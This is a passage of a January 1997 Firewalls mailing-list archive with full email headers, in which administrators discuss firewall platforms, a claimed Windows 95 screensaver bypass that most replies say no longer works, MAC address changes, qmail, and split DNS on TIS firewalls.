------------50A6E9754814-- From firewalls-owner Tue Jan 14 13:53:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA12539 for firewalls-outgoing; Tue, 14 Jan 1997 10:59:11 -0800 (PST) Received: from travelers.mail.cornell.edu (TRAVELERS.MAIL.CORNELL.EDU [132.236.56.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA12489 for ; Tue, 14 Jan 1997 10:57:59 -0800 (PST) From: nvs2@cornell.edu Received: from travelers.mail.cornell.edu (travelers.mail.cornell.edu [132.236.56.13]) by travelers.mail.cornell.edu (8.7.5/8.7.3) with SMTP id NAA21192 for ; Tue, 14 Jan 1997 13:52:04 -0500 (EST) Date: Tue, 14 Jan 1997 13:52:04 -0500 (EST) X-Sender: nvs2@travelers.mail.cornell.edu To: firewalls@greatcircle.com Subject: Unix or NT Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi All, I am a Master's student in Comp. Sc. and my master's project is the design and implementation of a firewall. The basic question ahead of me is whether to implement the firewall on NT or on Unix. Now, I dont know the advantages / pitfalls of either approach and since this is just a project my school doesnt care. But, all the discussions I hear on this mailing list are mainly about Unix firewalls and all the books talk about Unix only.Does that mean that it is tough to get any material to build Unix software.Also is it easier to do it on Unix since everything is so easily avaliable. I would greatly appreciate any advice that people would have. Thanx A very confused... Nik. ------ From firewalls-owner Tue Jan 14 13:56:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA10551 for firewalls-outgoing; Tue, 14 Jan 1997 10:13:45 -0800 (PST) Received: from io.org (io.org [198.133.36.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA10535 for ; Tue, 14 Jan 1997 10:13:30 -0800 (PST) Received: from psigurd.mkm.can.ibm.com (mpngt5.ny.us.ibm.com [198.133.29.68]) by io.org (8.8.3/8.6.12) with ESMTP id NAA12883; Tue, 14 Jan 1997 13:12:36 -0500 (EST) Message-ID: <32DBCC97.3D60@io.org> Date: Tue, 14 Jan 1997 13:12:39 -0500 From: Peter Sigurdson Reply-To: psigurd@io.org X-Sender: Peter Sigurdson (Unverified) X-Mailer: Mozilla 4.0b1 (Win95; I) MIME-Version: 1.0 To: PaLaN CC: firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU Subject: Re: WIN'95 FLAW X-Priority: Normal References: <3.0.32.19970114145623.006882b0@202.190.59.4> Content-Type: multipart/alternative; boundary="----------5A27318C21F88" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------5A27318C21F88 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii I tried it - I can access the start menu, but not activate any of its options - I have installed the service pack and all the fixpacks - maybe one of them corrected this.??? ------------5A27318C21F88 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
I tried it - I can access the start menu, but not activate any of its options - I have installed the service pack and all the fixpacks - maybe one of them corrected this.??? 
------------5A27318C21F88-- From firewalls-owner Tue Jan 14 13:59:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA07795 for firewalls-outgoing; Tue, 14 Jan 1997 08:57:22 -0800 (PST) Received: from deere-bh.dx.deere.com (deere-bh.dx.deere.com [207.122.201.66]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA07775 for ; Tue, 14 Jan 1997 08:56:58 -0800 (PST) Received: (from uucp@localhost) by deere-bh.dx.deere.com (8.6.12/8.6.11) id KAA22694 for ; Tue, 14 Jan 1997 10:57:29 -0600 Received: from deere.com by deere-bh.dx.deere.com via smap (V1.3) id sma022491; Tue Jan 14 10:57:11 1997 Received: from 90.deere.com (dts.90.deere.com) by deere.dx.deere.com (4.1/SMI-4.0) id AA08828; Tue, 14 Jan 97 10:56:13 CST Received: from t47up.90.deere.com by 90.deere.com (SMI-8.6/SMI-SVR4) id KAA03384; Tue, 14 Jan 1997 10:54:06 -0600 Message-Id: <32DBBA69.70D4@90.deere.com> Date: Tue, 14 Jan 1997 10:55:06 -0600 From: Bertrum Carroll Organization: Deere & Company X-Sender: Bertrum Carroll X-Mailer: Mozilla 4.0b1 (Win95; I) Mime-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: wading in syslog files X-Priority: Normal Content-Type: multipart/mixed; boundary="----------428458D464AA0" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is a multi-part message in MIME format. ------------428458D464AA0 Content-Type: multipart/alternative; boundary="----------137615D1535A1" ------------137615D1535A1 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Does anybody know of an app to review large syslog files for trouble spots? bc17684@90.deere.com ------------137615D1535A1 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
 Does anybody know of an app to review large syslog files for trouble spots?
 
bc17684@90.deere.com
------------137615D1535A1-- ------------428458D464AA0 Content-Transfer-Encoding: 7bit Content-Description: Address Book Card for Bertrum Carroll Content-Disposition: inline; filename="nsmail72.TMP" Content-Type: text/x-vCard; charset=us-ascii; name="nsmail72.TMP" BEGIN:VCARD FN:Bertrum Carroll N:Carroll;Bertrum EMAIL;INTERNET:bc17684@90.deere.com NOTE:Deere & Company Computer Security X-NAV-HTML:T END:VCARD ------------428458D464AA0-- From firewalls-owner Tue Jan 14 15:02:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA14542 for firewalls-outgoing; Tue, 14 Jan 1997 11:35:42 -0800 (PST) Received: from fti.framatech.com (fti.framatech.com [160.84.80.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA14505 for ; Tue, 14 Jan 1997 11:35:06 -0800 (PST) From: Thutchens@framatech.com Received: by fti.framatech.com; id OAA26168; Tue, 14 Jan 1997 14:56:24 -0500 Received: from ftimail.framatech.com(160.84.100.246) by fti.framatech.com via smap (3.2) id xma026144; Tue, 14 Jan 97 14:55:57 -0500 Received: from ccmail.framatech.com (ccmail.framatech.com [160.84.100.247]) by ftimail.framatech.com (8.6.11/8.6.9) with SMTP id OAA06535; Tue, 14 Jan 1997 14:38:00 -0500 Received: from ccMail by ccmail.framatech.com (SMTPLINK V2.11.01) id AA853281228; Tue, 14 Jan 97 13:34:16 EST Date: Tue, 14 Jan 97 13:34:16 EST Message-Id: <9700148532.AA853281228@ccmail.framatech.com> To: firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU, PaLaN Subject: Re: WIN'95 FLAW Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Not a problem on mine...I can't ALT+ESC and bypass. Maybe it's your version of Win 95? ______________________________ Reply Separator _________________________________ Subject: WIN'95 FLAW Author: PaLaN at INTERNET Date: 1/14/97 3:57 AM Howdy, I juz encountered a security (i would call it) flaw in M$ Windows'95 screensaver !! I don't know anyone of you encountered this or not but here it goes : If the Windows'95 Screen saver is active, you can break into without any password and all you have to do is : press the "windows" logo key (printed on the M$ keyboard) and there you are. If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have tried this with my own PC and my friends. It works.....try on your own PC. Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here ok..! Let me know if anyone of you encountered this. I'm goin to send M$ a mail on this bug but before that, I need to know whether any patch available for this...thx. rgds, PaLaN From firewalls-owner Tue Jan 14 15:08:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA10969 for firewalls-outgoing; Tue, 14 Jan 1997 10:25:52 -0800 (PST) Received: from internet (internet.dswnet.com [206.214.66.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA10949 for ; Tue, 14 Jan 1997 10:25:35 -0800 (PST) Received: from boni by internet (5.x/SMI-SVR4) id AA05111; Tue, 14 Jan 1997 10:25:02 -0800 Message-Id: <32DBCF84.B06@dsw.net> Date: Tue, 14 Jan 1997 10:25:08 -0800 From: "Boni D. Bruno" Reply-To: bbruno@dsw.net Organization: Data Systems West X-Mailer: Mozilla 3.01 (WinNT; I) Mime-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V6 #17 - FW-1 Hacking References: <199701132237.OAA08741@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Even if the FBI was using FW-1 and it was hacked, this does not prove FW-1 is a vulnerable firewall, it only shows that a misconfigured firewall can be penetrated. In most cases, it is due to these misconfigurations, design flaws or a poorly implemented security policy which is the real cause to such security breaches. Boni D. Bruno Director of Internet Services & Security Data Systems West ---------------------------------------------------- From: Timothy L Hermans This is the most ridiculous proof I have ever heard. Have you corroborated his story? How? What if I told you that there was a host called "hoover-wears-a-dress.fbi.gov". Would that be proof that I had hacked the FBI? Of course not. You'd have to hack in yourself to see. Looks like you and this "guy" are caught up in hacker-itis (ie. the idea that hacking the FBI makes everyone think you have big cojones). Figure out how to USE FW-1 competently and I'd be much more impressed. On Friday, Jan 10 "Gabriel Dura" wrote: > > There is a guy, working on his own, who claims he knows how to penetrate > FBI's firewall. > As a proof I was told that behind the firewall there is there is another > computer 'phi.fbi.gov'. > > > In the case of me being correctly informed and FBI is using FW-1 you have > an answer. > > > Hope it helps, > Gabriel Dura > dura@geocities.com > > > P.S. I can not guarantee the accuracy of this information and I can not > reveal the person who told me. > > > > ---------- > > From: mike > > To: firewalls@GreatCircle.COM > > Subject: FW-1 hacked? > > Date: miercuri, ianuarie 08, 1997 16:27 > > > > > Hi all > > Does anyone know if FW-1 was ever hacked? > > Tim Hermans FannieMae/MornetPlus Unix Engineering Group -- From firewalls-owner Tue Jan 14 17:17:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA19432 for firewalls-outgoing; Tue, 14 Jan 1997 12:43:20 -0800 (PST) Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA19328 for ; Tue, 14 Jan 1997 12:42:35 -0800 (PST) Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id PAA13484; Tue, 14 Jan 1997 15:38:52 -0500 Date: Tue, 14 Jan 1997 15:38:51 -0500 (EST) From: Todd Graham Lewis To: Pilar Lavin Mera cc: firewalls@GreatCircle.COM Subject: Re: TIS FWtk + netscape In-Reply-To: <199701141117.MAA08544@hydra.crisa.es> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 14 Jan 1997, Pilar Lavin Mera wrote: > My company has a network acceeding to internet through a SUN Sparc > Station + Solaris 2.3 and we have installed the TIS FWtoolkit. Our > problem is that we cannot configure netscape to pass through the > ftp-proxy. Can anyone help us? I recommend using Squid for both anonymous ftp and web access. C.f.: http://www.nlanr.net/Squid __ Todd Graham Lewis Linux! Core Engineering Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 From firewalls-owner Tue Jan 14 17:19:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA15392 for firewalls-outgoing; Tue, 14 Jan 1997 11:47:22 -0800 (PST) Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA15366 for ; Tue, 14 Jan 1997 11:47:05 -0800 (PST) Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id OAA13133; Tue, 14 Jan 1997 14:40:39 -0500 Date: Tue, 14 Jan 1997 14:40:39 -0500 (EST) From: Todd Graham Lewis To: Ken Kempster cc: Firewalls Mailing List Subject: Re: Ethernet hardware addresses In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 14 Jan 1997, Ken Kempster wrote: > Is this a perm. change. I was under the impression that the MAC > address was burned in at the factory. Will it revert back to its' > origional address after a reboot? It will revert to the original MAC upon reboot. However, if you are impersonating another ethernet card, then all you have to do is change the MAC address before bringing the interface up. There's no way, of which I can tell at least, to determine from outside whether or not the MAC is the factory-assigned one or a user-configured one. __ Todd Graham Lewis Linux! Core Engineering Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 From firewalls-owner Tue Jan 14 18:12:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA18079 for firewalls-outgoing; Tue, 14 Jan 1997 12:27:45 -0800 (PST) Received: from bdiwall0.bracco.com (bdiwall0.bracco.com [204.255.10.129]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA18051 for ; Tue, 14 Jan 1997 12:27:29 -0800 (PST) Received: by bdiwall0.bracco.com; id PAA04973; Tue, 14 Jan 1997 15:24:31 -0500 Received: from unknown(204.255.10.36) by bdiwall0.bracco.com via smap (V3.1.1) id xma004947; Tue, 14 Jan 97 15:24:06 -0500 Received: from ccMail by bdigate0.bracco.com (IMA Internet Exchange 1.04b) id 2dbeae10; Tue, 14 Jan 97 15:21:53 -0500 Mime-Version: 1.0 Date: Tue, 14 Jan 1997 15:27:05 -0500 Message-ID: <2dbeae10@bracco.com> From: mcruz@bracco.com (Michael Cruz) Subject: Re[2]: WIN'95 FLAW To: palan@dataprep.com.my, gunni@if.is (Gunnar Ingvi Thorisson) Cc: firewalls@greatcircle.com, sneakers@CS.YALE.EDU Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I thought this was the FIREWALL mailing list. mike ______________________________ Reply Separator _________________________________ Subject: Re: WIN'95 FLAW Author: gunni@if.is (Gunnar Ingvi Thorisson) at *Internet* Date: 1/14/97 8:14 AM > I juz encountered a security (i would call it) flaw in M$ Windows'95 > screensaver !! I don't know anyone of you encountered this or not but here > it goes : > > If the Windows'95 Screen saver is active, you can break into without any > password and all you have to do is : press the "windows" logo key (printed > on the M$ keyboard) and there you are. > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > tried this with my own PC and my friends. It works.....try on your own PC. This does not work for me, I've not tried to switch over to the English keyboard yet (I'm using Icelandic). Gunni gunni@if.is gunni@coda.is From firewalls-owner Tue Jan 14 19:10:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA25908 for firewalls-outgoing; Tue, 14 Jan 1997 14:03:49 -0800 (PST) Received: from newman.cris.com (newman.concentric.net [207.155.184.71]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA25901 for ; Tue, 14 Jan 1997 14:03:35 -0800 (PST) From: elosiris@concentric.net Received: from elosiris (cnc015058.concentric.net [206.83.80.58]) by newman.cris.com (8.8.3/(96/11/08 1.11)) id RAA05754; Tue, 14 Jan 1997 17:02:52 -0500 (EST) [1-800-745-2747 The Concentric Network] Message-Id: <199701142202.RAA05754@newman.cris.com> Comments: Authenticated sender is To: palan@dataprep.com.my (PaLaN), gunni@if.is (Gunnar Ingvi Thorisson) Date: Tue, 14 Jan 1997 15:03:01 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: WIN'95 FLAW CC: firewalls@greatcircle.com, sneakers@CS.YALE.EDU X-mailer: Pegasus Mail for Win32 (v2.42a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk this also does not work for me and i have the win95 enhanced keyboard From firewalls-owner Tue Jan 14 19:13:08 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA22954 for firewalls-outgoing; Tue, 14 Jan 1997 13:26:34 -0800 (PST) Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA22937 for ; Tue, 14 Jan 1997 13:26:24 -0800 (PST) Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.8.3/8.8.3) id HAA12130; Wed, 15 Jan 1997 07:25:33 +1000 (EST) Received: from guru.citec.qld.gov.au(147.132.20.47) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma012118; Wed Jan 15 07:25:15 1997 Received: (from sgcccdc@localhost) by guru.citec.qld.gov.au (8.6.12/8.6.12) id HAA08662; Wed, 15 Jan 1997 07:26:26 +1000 From: Colin Campbell Message-Id: <199701142126.HAA08662@guru.citec.qld.gov.au> Subject: Re: Ethernet hardware addresses To: lists@reflections.mindspring.com (Todd Graham Lewis) Date: Wed, 15 Jan 1997 07:26:26 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Todd Graham Lewis" at Jan 13, 97 05:42:32 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'd just like to add another bit of information on this topic: The Quad Ethernet card from Sun, as used in Solaris boxes does not have a MAC address! It just uses the Lance (le0) address. Hence all interfaces le0, qe0..qe3 have the same MAC address. Colin My mailer thinks Todd Graham Lewis said: [lots of stuff about MAC addresses] From firewalls-owner Tue Jan 14 20:03:41 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA07578 for firewalls-outgoing; Tue, 14 Jan 1997 17:37:50 -0800 (PST) Received: from cuc.edu (helix.cs.cuc.edu [204.32.57.128]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA07557 for ; Tue, 14 Jan 1997 17:37:41 -0800 (PST) Received: from localhost (sopwith@localhost) by cuc.edu (8.7.6/8.7.3) with SMTP id UAA18674; Tue, 14 Jan 1997 20:36:17 -0500 Date: Tue, 14 Jan 1997 20:36:17 -0500 (EST) From: Elliot Lee X-Sender: sopwith@helix.cs.cuc.edu To: Michael Cruz cc: firewalls@greatcircle.com Subject: Re: Re[2]: WIN'95 FLAW In-Reply-To: <2dbeae10@bracco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 14 Jan 1997, Michael Cruz wrote: > I thought this was the FIREWALL mailing list. The point is not to run Windows on your firewall (couldn't resist :D -- Elliot http://www.redhat.com/ "Huked on Fonix reely wurx fur me!" From firewalls-owner Tue Jan 14 20:05:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA09600 for firewalls-outgoing; Tue, 14 Jan 1997 18:07:44 -0800 (PST) Received: from palrel3.hp.com (palrel3.hp.com [15.253.88.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA09579 for ; Tue, 14 Jan 1997 18:07:25 -0800 (PST) From: ANDY_HIMAWAN@Non-HP-Indonesia-om1.om.hp.com Received: from hpsx1.indo.hp.com (root@hpsx1.indo.hp.com [15.59.169.1]) by palrel3.hp.com with SMTP (8.7.5/8.7.3) id SAA28847 for ; Tue, 14 Jan 1997 18:06:10 -0800 (PST) Received: from by hpsx1.indo.hp.com with SMTP (1.38.193.5/15.5+ECS 3.4 Openmail) id AA10950; Wed, 15 Jan 1997 09:05:48 +0700 X-Openmail-Hops: 1 Date: Wed, 15 Jan 97 09:05:19 +0700 Message-Id: Subject: HTTP Authentication To: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Item Subject: Message text Hello everybody, I just want to get information, Are there from you have experiences using Firewall (checkpoint, raptor, etc) using HPUX ? Can the firewall running well with HPUX ? I have tried using FW-1 Ver. 2.1a from Checkpoint, running on HPUX series 700,Rel. 10.01. I have tried using HTTP service, and the action is ACCEPT, and it works fine. But I always get trouble when I change the HTTP service using User Authentication. The Firewall machine always hang , and can not install the policy to the firewall again. Is it because I have to install the patch for the HPUX ? Any solution will be appreciated. Thank you very much. best regards, Andy From firewalls-owner Tue Jan 14 20:11:28 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA11796 for firewalls-outgoing; Tue, 14 Jan 1997 18:40:06 -0800 (PST) Received: from omsk.quadrix.com ([208.210.34.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id SAA11731 for ; Tue, 14 Jan 1997 18:39:06 -0800 (PST) Received: by omsk.quadrix.com (4.1/SMI-4.1) id AA23735; Tue, 14 Jan 97 21:36:27 EST Date: Tue, 14 Jan 97 21:36:27 EST From: bve@omsk.quadrix.com (BVE) Message-Id: <9701150236.AA23735@omsk.quadrix.com> To: firewalls@greatcircle.com Subject: Re: Qmail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: Darren Reed I don't want to throw cold water of the qmail authors' enthusiasm, but a reality check on this comparison seems needed. It is excellent to see someone is doing this but I can't see sendmail fading out the picture any time soon. I would second the reply already made to this message -- check out qmail. The design of several small programs, none of which run as root, is a very good one -- good enough that I don't feel I need smapd or smtpd in front of it. Why? Because the program that does the SMTP communication is as small (or smaller) as smapd! More importantly, it does just one task -- receiving the mail. It does not even do the routing of mail to another machine. That task is left to another small program. The only place you're going to break into the process to get root is inetd -- qmail's SMTP program is run from there. (This isn't a performance problem, since the program is small. In fact, if the numbers quoted are to be believed, qmail's performance is rather good.) Has anyone had a *bad* experience with qmail, yet? Anybody who's looked at the design have any potential downside in mind?? I'd love to hear about it! -- Bill Van Emburg Phone: 908-235-2335 Quadrix Solutions, Inc. Fax: 908-235-2336 (bve@quadrix.com) Check out http://yourtown.com! (http://quadrix.com) "You do what you want, and if you didn't, you don't" From firewalls-owner Tue Jan 14 20:13:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA13775 for firewalls-outgoing; Tue, 14 Jan 1997 19:04:20 -0800 (PST) Received: from perseus.ultra.net (perseus.ultra.net [199.232.56.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA13723 for ; Tue, 14 Jan 1997 19:04:01 -0800 (PST) Received: from zandar (firewall-user@joesmac.ultranet.com [199.232.59.222]) by perseus.ultra.net (8.7.4/ult1.04) with SMTP id WAA28064; Tue, 14 Jan 1997 22:02:46 -0500 (EST) Received: by zandar with Microsoft Mail id <01BC0266.A9A65020@zandar>; Tue, 14 Jan 1997 22:02:41 -0500 Message-ID: <01BC0266.A9A65020@zandar> From: Joseph Judge To: Jung Jun Lee , "'char'" Cc: GreatCircle Subject: RE: How can I configure hidden DNS on TIS? Date: Tue, 14 Jan 1997 22:02:35 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have to answer this ... I see that Char has (Hi Char!) answered.=20 Jung - Char seems to be pointing out "split brain" DNS setup. This is = where your internal users resolve their DNS against the company, = internal DNS server. That server will forward requests to the firewall = DNS server as needed to resolve external names.The firewall DNS machines = resolve against the internal DNS server. Internal names resolve against the internal DNS server ... Internet = names get resolved by the internal server asking the firewall DNS server = for answers.=20 So, you have the firewall DNS server - who thinks it is authoritative = for XXX.com .... *AND* the internal DNS servers think they are = authoritative for XXX.com, also. This is not a problem since they are = serving "different faces" to the folks. The firewall DNS has the few = names that the Internet needs ... the internal a fuller, richer set of = records for internal folks. This just means that the internal DNS should = not ask the firewall DNS server about XXX.com records ... but take the = info from its own files. Problems might be ... Since the firewall resolves against internal servers, then through the = firewall DNS server (to get non XXX.com names) ... then you could get a = tad bit of slowness. Also, internal DNS problems cause firewall hosts to = have resolution problems. Also, *IF* ... just if ... somehow ... some DNS server inside you = company ever "sees" an external record for your XXX.com DNS --- it can = "poison" your internal DNS servers. =20 For example, if your firewall application relay host is relay.XXX.com = .... Your external DNS may have a * MX record for XXX.com via = relay.XXX.com [ ip address 111.222.333.444 - the external interface ] = ... if that record poisoned your internal DNS, it could cause internal = email to stick --- trying to forward via the external interface of you = firewall, which internal hosts cannot reach. This may also come with = some glue records for the relay.XXX.com name so that email to the = Internet is affected also (relay.XXX.com internally is thought to be at = 111.222.333.444 - external interface). Sorry to rant a bit on split brain DNS ... I don't see a need for it = unless you have a transparent firewall and/or want internal hosts to do = some firewall things transparently. I like the crossing from inside to = outside to be noticeable to a user. Cheers - * joe ---------- From: char[SMTP:csample@v-one.com] Sent: Monday, January 13, 1997 5:06 AM To: Jung Jun Lee Cc: GreatCircle Subject: Re: How can I configure hidden DNS on TIS? On Mon, 13 Jan 1997, Jung Jun Lee wrote: > =1B$)CHi.. > If I configure TIS to primary DNS, Can I use internal DNS for hidden? >=20 > Thanks >=20 >=20 Of course this is a TIS customer support quetion... but you will need to build an internal primary DNS on another machine... the internal primary NS will slave forward to the Gauntlet. The Gauntlet has minimal names on it and point Gauntlet's /etc/resolv.conf to the internal=20 nameserver char +------------------------------------------------------------------------= ---+ char sample /* that really is my name */ e-mail: char@v-one.com +------------------------------------------------------------------------= ---+ From firewalls-owner Tue Jan 14 20:17:38 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA16083 for firewalls-outgoing; Tue, 14 Jan 1997 19:38:41 -0800 (PST) Received: from extol.com.my (mail.extol.com.my [202.185.238.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA16048 for ; Tue, 14 Jan 1997 19:38:26 -0800 (PST) Received: by portal.extol.com.my id <21897>; Wed, 15 Jan 1997 19:47:50 +0800 Message-Id: <97Jan15.194750gmt+0800.21897@portal.extol.com.my> Date: Wed, 15 Jan 1997 18:52:27 +0800 From: pclow Reply-To: pclow@pc.jaring.my X-Sender: pclow (Unverified) X-Mailer: Mozilla 4.0b1 (Win95; I) MIME-Version: 1.0 To: elosiris@concentric.net CC: PaLaN , Gunnar Ingvi Thorisson , firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU Subject: Re: WIN'95 FLAW X-Priority: Normal References: <199701142202.RAA05754@newman.cris.com> Content-Type: multipart/alternative; boundary="----------5D6B5CB932514" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------5D6B5CB932514 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Alright, alright, what PaLaN (lamer name) spewed was an old, repeat OLD bug that was rectified some releases ago. The new releases will not work with the alt+esc/ms key. However you will find that it may work with AfterDark. The one I have is one version ago, (forgot which version, though ). -- What is man that thou are mindful of him? elosiris@concentric.net wrote: > > this also does not work for me and i have the win95 enhanced keyboard ------------5D6B5CB932514 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
Alright, alright, what PaLaN (lamer name) spewed was an old, repeat
OLD bug that was rectified some releases ago.  The new releases will
not work with the alt+esc/ms key.  However you will find that it may
work with AfterDark. The one I have is one version ago,
(forgot which version, though ).
-- 
What is man that thou are mindful of him?
 elosiris@concentric.net wrote:

> this also does not work for me and i have the win95 enhanced keyboard

------------5D6B5CB932514-- From firewalls-owner Tue Jan 14 21:04:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA16391 for firewalls-outgoing; Tue, 14 Jan 1997 19:45:40 -0800 (PST) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id TAA16366 for ; Tue, 14 Jan 1997 19:45:20 -0800 (PST) Message-Id: <199701150345.TAA16366@miles.greatcircle.com> Received: from [198.168.1.45] by cat.bbsr.edu (SMTPD32-3.00) id A1DDE0300FC; Tue Jan 14 23:41:17 1997 From: "Jamie Thain" To: "John LaMoureux" , , , Subject: Re: WIN'95 FLAW -Reply Date: Tue, 14 Jan 1997 23:39:20 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk John, Ah I don't think so, at least not NT 4.0. There was a known flaw in NT3.51 where if you had the screen server and ran the shutdown from the resource kit it would display a message saying that your PC was going to shutdown, and then if you stoped it, you could get to an unlocked PC. However are you sure you have "Password protected" selected. regards:jamie ---------- > From: John LaMoureux > To: sneakers@CS.YALE.EDU; palan@dataprep.com.my; firewalls@GreatCircle.COM > Subject: WIN'95 FLAW -Reply > Date: Tuesday, January 14, 1997 9:41 AM > > Unfortunately, this flaw can be found in M$ Windows NT as well, both > SERVER and WORKSTATION (it works with any screen saver, even > those that do not ship with the product.) I would also be interested in > any known patch or fix, as I just started deploying NT throughout my > enterprise! > > >>> PaLaN 01/14/97 05:56pm >>> > Howdy, > > I juz encountered a security (i would call it) flaw in M$ Windows'95 > screensaver !! I don't know anyone of you encountered this or not but > here > it goes : > > If the Windows'95 Screen saver is active, you can break into without any > password and all you have to do is : press the "windows" logo key > (printed > on the M$ keyboard) and there you are. > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I > have > tried this with my own PC and my friends. It works.....try on your own PC. > > Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here > ok..! Let me know if anyone of you encountered this. > > I'm goin to send M$ a mail on this bug but before that, I need to know > whether any patch available for this...thx. > > > rgds, > PaLaN > > > From firewalls-owner Tue Jan 14 21:15:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA18701 for firewalls-outgoing; Tue, 14 Jan 1997 20:20:21 -0800 (PST) Received: from m4.sprynet.com (m4.sprynet.com [165.121.2.96]) 